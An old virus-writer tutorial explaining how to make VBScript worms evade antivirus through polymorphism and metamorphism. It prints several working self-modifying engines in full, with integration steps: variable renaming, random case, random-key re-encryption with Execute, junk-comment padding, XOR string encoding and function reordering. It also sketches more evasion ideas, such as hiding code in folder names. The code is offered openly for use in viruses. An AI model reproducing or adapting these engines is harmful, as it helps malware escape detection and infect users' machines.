Contribution - Morphing for Dummies    [by Cerebro]

  

	This text isn't gonna teach you to change to a duck or a pigeon..it explains the various
	techniques invloved in VBS (Visual Basic Script) for evading AV (Anti Virus)

	Disclaimer :	The author, Cerebro (thats me..yaa), is in no way responsible for your
			actions caused by information provided in this tutorial (as i call it)
			i would like to thank the author of 'P1' code for his/her code
			plz email me your name/handle so that your name can be credited..
			thanx again

	Intro :
	I have seen tutorials on polymorphism and metamorphism (and oligomorphism..god knows what
	that is.....) for languages like ASM
	and others like JavaScript but never came across a "VBS Morphing Tutorial"
	So i decided to write one..hope it inspires ppl to do more on the subject...

	I hope you are not new to VBS coz its gonna be little complex..
	Im gonna teach you things that ppl thought was quite impossible..till now!!

	There are various tech disccused here that u may have heard of like
	o polymorphism - No..no.. not the simple ones..advanced ones
	o metamorphism - Ever heard of these cute things..ppl theorize but don't practice
	o ideas	       - Some ppl have them..!!?? u know
			 (these contain codes that i failed to make bugproof..damn errors)

				INDEX
				-=-=-
	      CODE		NAME		AUTHOR		WHAT THEY DO?
	-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
		P1      	N/A     	N/A          changing variables
		P2     		RAzzar		Cerebro      Random case Generation
	  	P3              opo		Cerebro      vir-body polymorph
		P4		TrasH		Cerebro      adding trash between lines
		P5		hitf1		Cerebro      special string polymorph
		M1		Morpheus 1.2	Cerebro      a metamorph



	This text includes 5 (yes thats right..5) kinds of polymorph engines
	also 1 metmorph engine (Ver 1.2 of Morpheus ME).

	Some encryption routines and things that work as they've promised...and some
	that don't =(




					   POLYMORPHISM
					==================
	(This following text is for beginners if you already know technical stuff you can skip a few stanzas)
	Ok! lets start..
	For polymorphing you need matter (that means code) and encryption routines capable of handling
	multiple keys..

	The following encryption routine cannot be used for polymorphism coz it cannot handle multiple keys
	infact no keys at all except the body itself
	----------------------------------
	Function LameCrypt(text)
	For i = 1 to len(text)
	tt = tt & chr(int(asc(mid(text,i,1))/i))
	next
	LameCrypt = tt
	End Function
	----------------------------------

	The basic defination of polymorphism Is 'having many forms'...thats not hard..is it?
	For eg. imagine a VBS worm (like Anna Kournikova).
	It was encrypted and wasn't naked with its code like ILOVEYOU and other couzins of it.
	The AV could have easily detected it as a 'New Virus' just by observing its code..But because
	of its encryption it slipped thru and caused a little havoc..but after a few hours it was virtually
	detectable by every AV...

	So what does that teach us..Yeah! ENCRYPTION IS OUR FRIEND, BUT NOT A GOOD ONE..

	The Pica worm was detected later because the code was same in every copy of its infections (in comp).
	The encryption was worthless coz the same string caused it to be detected..
	What we need is a code that encrypts itself (we know to do that) but then use different
	encryption keys and routines for every copy of itself..

	For eg.
	The character 'A' can be 'encrypted' by adding 2 to its ASCII value so the
	Enc.code becomes C (65 + 2 = 67 = asc("C")).
	to get the original code we just have to substract 2 and yippee we have the org code..
	But what if instead of 2 we use 3,4,5,6,9...there are infinite possibilities.
	So as long as there is variety our code can be safe from AV's..

	Here's the first kind of polymorphing (a beginners code).

	This isn't my code so i don't take credit for it..
	This code changes its variable names AND FUNCTION NAMES every time it runs...
	like
	a = 6  becomes  safsaf = 6
	===========================
		Code P1 (THis wasn't my idea nor my code so i don't own it)
	===========================
	Set FSO=CreateObject("Scripting.FileSystemObject"):Randomize
	Set OS=FSO.OpenTextFile(Wscript.ScriptFullName,1,True)
	Self=OS.ReadAll:OS.Close
	VAR="FSO,OS,Self,S1,VAR,A1,CVAR,VA,B1,"
	S1=Split(VAR,Chr(44),-1,1)
	For A1=0 to UBound(S1)
	Self=Replace(Self,S1(A1),CVAR(S1(A1)),1,-1)
	Next
	Function CVAR(VA):For B1=1 to Len(VA)
	CVAR=CVAR&Chr(Int(Rnd*26)+65):Next:End Function

	===========================
	     END Code P1
	===========================

	Now that that's over!! Lets move on.

	The following code randomly changes the case of the code...(like POP becomes pOp).

	NOTE : I've seen this has no effect over AV's.
	As they still detect them as before. Yet I've decided to put this so someone can be creative about
	the idea..For this tech I include a function that i call 'Random case Generator'
	or as i call it RcG
	===========================
		Code P2 (RAzzar Mutation By Cerebro)
	===========================

	dIM FSo,sRC,Des
	sET fsO = cREAtEOBJeCt("ScriPTInG.FILESYsTEmObJeCT")
	SET srb = fSo.oPenTExtfILe(WsCript.scriPTfUllnaMe,1)
	FiN = rCG(sRB.ReaDaLL)
	sEt FUz = Fso.CreaTeTexTfiLE(WsCRiPT.SCRIPTfULlnaME,TRuE)
	FUZ.wRItELINe fIN
	FUz.CLoSE
	fUnCTION RCG(txt)
	FOr I = 1 tO lEn(TXT)
	RanDoMIze
	bIT = miD(Txt,I,1)
	if (INT(Rnd * i) mod 2) = 1 Then
	RAm = ucase(Bit)
	eLsE
	RAm = lCAsE(bit)
	End If
	RCg = rCG & ram
	nEXT
	end fUNctIoN
	===========================
	     END Code P2
	===========================


	There was no encryption involed in the previous codes it was 'mutation' that existed
	and in comparision to AV technology it dosen't stand a chance in the wild..But chk
	these out!! AV's will have a hard time we just need to optimize this code
	and get a new infection routine and poof! We have an undetectable code!!

	===========================
		Code P3 ('opo' polymorph engine By Cerebro)
	===========================
	'Cerebro's Poly Engine
	enx = "Function enc(zzz)"& vbcrlf &_
	"for q = 1 to len(zzz)"& vbcrlf &_
	"byt = asc(mid(zzz,q,1))"& vbcrlf &_
	"ch = chr(key - byt)"& vbcrlf &_
	"if ch = chr(34) then"& vbcrlf &_
	"ch = chr(28)"& vbcrlf &_
	"end if"& vbcrlf &_
	"enc = enc & ch"& vbcrlf &_
	"next"& vbcrlf &_
	"end function"
	execute (enx)
	Set fso = CreateObject("Scripting.FileSystemObject")
	Randomize
	key = int(rnd * 129)+116
	if len(UnCrypt) <> 0 then
	fin = enc(UnCrypt)
	else
	Set meb = fso.OpenTextFile(wscript.scriptfullname,1)
	bod = meb.readall
	fin = enc(bod)
	end if
	aa = rndwrd(int(rnd * 8)+2)
	bb = rndwrd(int(rnd * 7)+3)
	cc = rndwrd(int(rnd * 6)+4)
	dd = rndwrd(int(rnd * 5)+5)
	ee = rndwrd(int(rnd * 6)+4)
	ae = rndwrd(int(rnd * 7)+3)
	ff = rndwrd(int(rnd * 8)+2)
	denx = "Function "&ff&"("& aa &")"& vbcrlf &_
	"for "& bb &" = 1 to len("& aa &")"& vbcrlf &_
	""& dd &" = asc(mid("& aa &","& bb &",1))"& vbcrlf &_
	""& ee &" = chr("& cc &" - "& dd &")"& vbcrlf &_
	"if "&ee&" = chr(28) then"& vbcrlf &_
	""&ee&" = chr(34)"& vbcrlf &_
	"end if"& vbcrlf &_
	ff&" = "&ff&" & "& ee &""& vbcrlf &_
	"next"& vbcrlf &_
	"end function"
	Set fuz = fso.CreateTextFile("Wscript.vbs",True)
	fuz.Writeline cc&" = "& key
	fuz.Writeline ae&"="""& fin &""""
	fuz.Writeline "UnCrypt =  "&ff&"("&ae&")"
	fuz.Writeline "msgbox UnCrypt"
	fuz.Writeline "Execute UnCrypt"
	fuz.Writeline denx
	fuz.close

	function rndwrd(l)
	for i = 1 to l
	Randomize
	wrd = wrd & chr(int(rnd * 26)+97)
	next
	rndwrd = wrd
	end function

	===========================
	       END Code P3
	===========================

	Ok!..So the code is frizzy and quite dirtily coded (any guess who coded the thing..yup it was me!).
	There are a total of 129 different encryption keys possible so its quite random..but still it isn't
	enough to protect your innocent worm/virus from prying AV's.
	So we have to code a better code..
	----------------------------------------------------------------------------------------------------
	Quote : There is always a better and a worse code ....
	----------------------------------------------------------------------------------------------------

	This code was adapted from the idea of the worm VBS.NewLove.
	It isn't the same code I reconstructed it using compact coding.
	Lets see..this code does'nt give a cows ass what its code displays
	it merely increases its filesize by adding trash to its own matter
	(between lines remark statements..).
	Believe it or not it actually worx..in evading AV's (some of them anyways).

	===========================
		Code P4 (Trash By Cerebro)
	===========================
	On Error Resume Next
	Function Wrd(no)
	for i = 1 to int(rnd * 66)+no
	Randomize
	wrd = wrd & chr(int(rnd * 26)+65)
	next
	end function
	Set FSO= Createobject("scripting.filesystemobject")
	Set sef=FSO.OpenTextFile(WScript.ScriptFullname,1)
	bod = sef.readall
	line = split(bod,vbcrlf)
	for n = 1 to ubound(line)
	if not(len(line(n))) = 0 then
	if not(mid(line(n),1,1)) = "'" then
	a = ""
	for s = 1 to int(Rnd*10)
	a = a & vbcrlf &"'"& wrd(int(Rnd*10)+2)
	next
	Script=Script & a& vbcrlf & Line(n)
	end if
	end if
	next
	Set rep=FSO.CreateTextFile(Wscript.ScriptFullname,true)
	rep.write Script
	rep.close

	===========================
	       END Code P4
	===========================

	That was fun!! See that the code mutates itself with trash increasing its size.
	One can easily configure it to do more..and the interesting thing is, just by adding
	some more lines one can increase the filesize up to 800 Kb..yeah! Its true..u heard it
	first on the Cerebro's show.

	After a hectic day at the trash polymorphism i give you a doze of...
	well more morphing. This time its
	STRING POLYMORPHISM

	You must have seen viruses/worms having codes like..
	------------------------------------------------------------
	Set fso = CreateObject(x("353293259853535436657747547543"))
	------------------------------------------------------------
	where 'x' would be function and would decrypt the parameters.
	Its quite a good way to evade AV ppl =)

	I was pondering over a method for polymorphism by this method and then thought
	of a variation...
	In the following code only the strings gets polymorphed..
	as I calculated my codes extent of polymorphism it turns out that it was
	very efficient..the more strings you bring up..the more polymorphic it
	becomes...


	===========================
		Code P5  (hitf1 By Cerebro)
	===========================
	dim fun,fso

	fun = "cjctz"
	a = cjctz("",139)
	b = cjctz("",175)
	c = cjctz("",146)
	newm = hitf1
	newm = replace(newm,fun,rndwrd(5))
	Set rep = fso.createtextfile("pop.vbs",1)
	rep.writeline newm
	rep.close

	Function cjctz(txt,key)
	for i = 1 to len(txt)
	qwe = qwe & chr(asc(mid(txt,i,1)) Xor key)
	next
	cjctz = qwe
	end function

	function hitf1()
	hah = fun & "(" & chr(34)
	set fso = CreateObject(cjctz("耯",198))
	Set myself = fso.Opentextfile(wscript.ScriptFullname,1)
	body = myself.readall
	lines = split(body,vbcrlf)
	for each line in lines
	w = instr(line,hah)
	if w > 0 then
	x = instr(w,line,")")
	hash = mid(line,w,x-w+1)
	execute("dec = " & hash)
	randomize
	r = int(rnd *132)+123
	enc = fun & chr(40) & chr(34) & cjctz(dec,r)& chr(34) &","& r &")"
	o = replace(body,hash,enc)
	body = o
	end if
	next
	hitf1 = body
	end function

	function rndwrd(l)
	for i = 1 to l
	wrd = wrd & chr(int(rnd * 26)+97)
	next
	rndwrd = wrd
	end function

	===========================
	        END Code P5
	===========================

	I call this the 'hitf1' engine.
	Stop that applause!!
	So now its time to kick more AV ass..I see ppl are beginning to like me more..

	Okay..it's the first VBS metamorph that I've seen so far..and it was coded by
	ME! (no not WinME Engineers)

	===========================
		Code M1  (Morpheus ver - 1.2 By Cerebro)
	===========================

	const nooffunc = 5
	dim ch(5),sig(2)
	Morpheus()
	Function Morpheus()
	randomize
	set fso = CreateObject("Scripting.FilesystemObject")
	Set self = fso.opentextfile(wscript.Scriptfullname,1)
	body = self.readall
	sig(1) = chr(102) & chr(117) & chr(110) & chr(99) & chr(116) & chr(105) & chr(111) & chr(110)
	sig(0) = chr(101) & chr(110) & chr(100) & chr(32) & sig(1)
	Set piss = fso.createtextfile(wscript.Scriptfullname,1)
	newm = morph(body)
	for k = 0 to ubound(ch)
	bod = bod & ch(k) & vbcrlf & vbcrlf & vbcrlf
	next
	numfunc = cnter(bod)+1
	piss.writeline "const nooffunc = "& numfunc  & vbcrlf
	piss.writeline "dim ch("& numfunc &"),sig(2)"& vbcrlf
	piss.writeline "Morpheus()"
	do
	randomize
	hh = int(rnd * (newm+1))
	aa = instr(mutant,ch(hh))
	if aa = 0 then
	mutant = mutant & ch(hh) & vbcrlf & vbcrlf & vbcrlf
	n = n +1
	end if
	if n = newm+1 then
	exit do
	end if
	loop
	piss.writeline mutant
	piss.close
	end function


	Function Mutator()
	text = sig(1) & " "
	for i = 1 to int(rnd * 11)+4
	randomize
	text = text & chr(int(rnd * 26)+97)
	next
	if len(text) = 9 then text = text & chr((day(now) mod 26)+65) & chr((year(now) mod 26)+65)
	text = text & "()"
	for i = 1 to int(rnd * 10)+10
	randomize
	text = text & vbcrlf &"'"
	for j =1 to int(rnd * 100)+25
	randomize
	text = text & chr(int(rnd * 26)+97)
        next
	next
	text = text & vbcrlf & sig(0)
	Mutator = text
	End function


	Function Cnter(txt)
	dim w,ind
	txt = lcase(txt)
	w = 1
	ind = 0
	while (w <> 0)
	w = instr(w+1,txt,sig(1))
	ind = ind+1
	wend
	cnter = (ind/2)
	End function


	Function Morph(txt)
	for j = 0 to (nooffunc-2) 'till exactly the  number of fnctions
	start = instr(edfun+6,lcase(txt),sig(1))
	edfun = instr(edfun+6,lcase(txt),sig(0))
	ch(j) = mid(txt,start,edfun-start+len(sig(0)))
	next
	'add new fake fnctions
	if ((day(now)+month(now)) mod 4)=0 then
	ch(nooffunc-1) = Mutator
	Morph = nooffunc-1
	else
	ch(nooffunc-1) = ""
	Morph = nooffunc-2
	end if
	End Function


	===========================
	      END Code M1
	===========================

	READ THIS BEFORE USING ANY OF THE CODE
	there are a few backlash to this code
	. firstly, it is dependent on the word 'function'
		   if it finds the word in its code which
		   does not represent a function (like in REM lines)
		   then it will destroy its own code

	. Secondly, the const nooffunc.
		    its value must be always 1 more than the
		    number of functions in the code like the above code
		    has 4 functions but the value of noofunc is 5 ie (4+1)
	. Thirdly,  the rest of the code, you have to
		    confine your original code to functions (like in C++ you can't have freecode)
		    which means its becomes a sort of a VB code..

	By freecode I mean the code that isn't inside a function or sub but
	in the main program.

	Yes these flaws are threatening the code but it still can be the most
	powerfull technique...
	if sum of date and month is divisible by 4 then a new function is added
	if you want to use this in your code do the following...
	1)	make your code function integrated (it means all codes in functions)
		and able to be executed by 1 function call
	2)	increase the value of (nooffunc) to "number of function + 1"
	3)	before the line [piss.writeline "Morpheus()"]
		add [piss.writeline "yourfunction()"]

	That's it.."oh and also add where you got the metamorph code from"
	hey I need credits okay!!
	0000000000000000000000000000000000000000000000000000000000000000000000000000000000000

	This is the last section of my tutorial..

	Every coin has 2 sides....(so what if both are heads)

	I'm gonna make you aware of the flaws in these codes that may cause the permanent
	deformation of itself

	P1 = Though it is theorectically good in structure..
		the problem lies in its ignorance for value of its code.
		Lets suppose the random variable conflicts a existing function or any other
		like for eg
		-------------------------------
		set lo = CreateObject(".....")
		--------------------------------
		If you remember right there was a ".close" line in the code.
		Let the new variable generated be 'xyz',
		now the lines become
		-------------------------------
		set xyz = CreateObject(".....")
		....
		....
		....
		someshit.writeline newcode
		someshit.cxyzse
		--------------------------------
		Do you get my point...like 'lo' it can be 'eat' conflicting with CreateObject

	P2 = There is no fault in the code coz VBS is not case-sensitive
		However it may coz problems when we drop a 'JS' file.
		For eg..
		Lets suppose I made a virus in VBS that drops JS code that
		is injected into htm* files.
		There is no point in injecting if the code is like
		"iF MaRkEr != "ViRuS" ". It will simply collapse.
		I suggest converting it lower case (lcase() function).

	P3 = Like Microsoft's 'Explorer.exe' this is very buggy.
		If while encryption some characters that are undefined
		are written then it gives out an error.

	P4 = TrasH, it is beyond our control coz once the filesize increases
		it keeps increasing and gradually the code becomes slow
		and degrades the code performances and ultimately crashes.

	P5 = hitf1, this code has similar flaws that the metamorph has
		and it is dependent on the function name.
		The " character can cause a problem if it comes up in the
		encrypted body.

	P6 = There is'nt one!!

	M1 = I've already discussed them..


	.:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.

	Time for 'broken ideas' this section deals with:
	. When AV's Attack
	.

	_When_AV's_Attack_

	(1)	A meta-polymorph that encrypts its different functions with different keys
		and randomly arranges them in new codes.

	(2)	A code that uses only a part of its code while executing and store its
		rest of the code in variables or REM statements then after execution switches
		codes..

	(3)	math-morph
		See this:
		Consider:
		Addition = A
		Substraction = S
		Multiplication = M
		Division = D

		let x be any number in the code
		MADS of 'x': Means:
				x * x + x / x - x = x
				  M   A   D   S

		There are a lot of such combinations
		like this.
		ADMS of x: is also x
		ASD of x: is ALWAYS = 1 (one)
		all you have to do is replace

		",1" and "(10)" with strings like "(1 * 1 + 1 / 1 - 1)" alongwith ()


	(4) Stealth tech like thingees

      _._ Folder Shelter : From the name I assume you are thinking...
			   "Oh! this guy is gonna tell us about ASCII folders"
			   Trust me it isn't whack about ASCII folders.

			   Lets face that Av's are more advanced than us.
			   But they are always 1 step behind us because when we inovate
			   they have no idea what we are gonna do.

			   AV's scan folders but not their names.
			   What if we create dummy folders that contains
			   our code?

			   We create 10 folders for 10 lines of our code,
			   like:
			   Folder1 = "Set fso...."
			   Folder2 = "Virus things"
			   .......

			   There are two problems:
			   Folder names can't have special charaters in them
			   so we ENCODE the lines using ASCII CODES,
			   like A is 65.
			   The SECOND PROBLEM:
			   How do we know that a folder is a dummy folder?
			   The virus-extractor should know legitimate folders from viral ones,
			   so we use a marker like this:

			   Folder1 = "Marker659498624987614124.."

			   See, all the extractor has to do is:
			   1) scan through folders and subfolders (or better yet use a parent folder)
			   2) if first 6 characters of folder (names) are = "Marker" then read the rest
				then decrypt

				Then you will see Av's will have no idea what is happening.

	_._ Random ExeMorph : I have coded this engine and it was too simple so I decided not
			      to include the code but the idea, so programmers can code themselves.
			      The key is to morph random lines in our code like this
			      for eg:
			      Msgbox "pop"
				becomes
			      Execute ("chr(x) & chr(y) &......")
			      You get it don't you, and oh! Yeah AVOID MORPHING lines having strings like
			      "Next","end","Function","Sub"

	_._ JUGGLE : DAMN IDEA does work but is buggy.
			Okay! Generate a key that is a number that is less than length of (VirBody).
			Juggle pieces of codes like so:

			Assume this is hardcore virus.
			Virbody = "Infection,Payload,Stealth,Worming"
			Generated key is 4.
			The juggle: Take 4 characters at a time and reverse them.
			virbody = "efnIoitcaP,n........bah! humbug"
			You see there are many possibilities and best of all you need only
			ONE function to ENCRYPT AND DECRYPT.
			Here's a prototype...'n' is the key and 'txt' is the body to be jumbled.
			Use it like this:
			newbody = Juggle(virbody,key)
			================================
			Function Juggle(txt,n)
			for i = 1 to len(txt) step n
			crunch = strreverse(mid(txt,i,n))
			jug = jug & crunch
			next
			juggle = jug
			end function
			================================

	_._ Brute : It is a polymorphic code that bruteforces a key for decryption.
			The good thing about this is, there is no need to write a key.
			Use a random number and forget about it.


	*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&

	I am very dissapointed when top virus writers write virii that "EVADE AV's".
	I mean a virus should be the Predator and not the prey..
	*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&

	"There will be a kind.."
	"There will be a time.."
	"There will be a creed.."
	"Till no one sees me.."

			Well its that time when we end this tutorial..
			If you found any bugs, problems, pimples drop an email.

PS : If you feel you wanna kick my ass or flame me then email addy is root@microsoft.com